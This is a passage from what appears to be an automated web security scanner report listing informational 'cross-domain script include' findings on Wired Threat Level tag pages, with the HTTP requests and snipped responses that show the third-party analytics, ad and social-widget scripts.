Host:	http://www.wired.com
Path:	/threatlevel/category/yo-ho-ho/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/yo-ho-ho/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:21:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=49
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.135. http://www.wired.com/threatlevel/tag/4chan/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/4chan/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/4chan/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:55 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=43
Expires: Wed, 12 Jan 2011 15:33:33 GMT
Date: Wed, 12 Jan 2011 15:32:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.136. http://www.wired.com/threatlevel/tag/aclu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/aclu/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/aclu/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:56 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=48
Expires: Wed, 12 Jan 2011 15:33:46 GMT
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.137. http://www.wired.com/threatlevel/tag/al-haramain/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/al-haramain/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/al-haramain/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:58 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:03 GMT
Date: Wed, 12 Jan 2011 15:33:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.138. http://www.wired.com/threatlevel/tag/albert-gonzalez/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/albert-gonzalez/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/albert-gonzalez/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:32:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=50
Expires: Wed, 12 Jan 2011 15:33:53 GMT
Date: Wed, 12 Jan 2011 15:33:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.139. http://www.wired.com/threatlevel/tag/apple-iphone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/apple-iphone/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/apple-iphone/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.140. http://www.wired.com/threatlevel/tag/blackhat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/blackhat/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/blackhat/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:44:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:34:07 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.141. http://www.wired.com/threatlevel/tag/bradley-manning/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/bradley-manning/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/bradley-manning/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:06:25 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=62
Expires: Wed, 12 Jan 2011 15:34:08 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.142. http://www.wired.com/threatlevel/tag/carding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/carding/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/carding/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:00 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=54
Expires: Wed, 12 Jan 2011 15:34:05 GMT
Date: Wed, 12 Jan 2011 15:33:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.143. http://www.wired.com/threatlevel/tag/ccc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/ccc/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/ccc/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.144. http://www.wired.com/threatlevel/tag/censorship/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/censorship/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/censorship/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:02 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:25 GMT
Date: Wed, 12 Jan 2011 15:33:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.145. http://www.wired.com/threatlevel/tag/china/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/china/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/china/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.146. http://www.wired.com/threatlevel/tag/copyright/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/copyright/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/copyright/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.147. http://www.wired.com/threatlevel/tag/crime/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/crime/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/crime/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:06 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=57
Expires: Wed, 12 Jan 2011 15:34:33 GMT
Date: Wed, 12 Jan 2011 15:33:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.148. http://www.wired.com/threatlevel/tag/defcon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/defcon/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/defcon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
